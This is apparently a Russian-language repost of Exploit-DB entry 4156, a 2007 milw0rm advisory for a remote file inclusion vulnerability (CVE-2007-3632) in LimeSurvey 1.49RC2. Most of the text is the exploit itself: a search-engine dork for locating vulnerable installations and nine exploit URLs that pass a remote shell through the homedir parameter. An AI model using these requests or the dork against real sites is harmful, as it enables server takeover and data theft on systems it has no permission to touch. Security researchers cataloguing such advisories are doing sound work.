- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4156
- Проверка EDB
-
- Пройдено
- Автор
- YAKIR WIZMAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3632
- Дата публикации
- 2007-07-06
Код:
## Owner : Pr0T3cT10n
## Email : [email protected]
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"
## Bug :
## Files :
## /admin/classes/pear/OLE/PPS/File.php
## /admin/classes/pear/OLE/PPS/Root.php
## /admin/classes/pear/Spreadsheet/Excel/Writer.php
## /admin/classes/pear/OLE/PPS.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php
## Exploit :
## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
## Thanks : str0ke
# milw0rm.com [2007-07-06]- Источник
- www.exploit-db.com
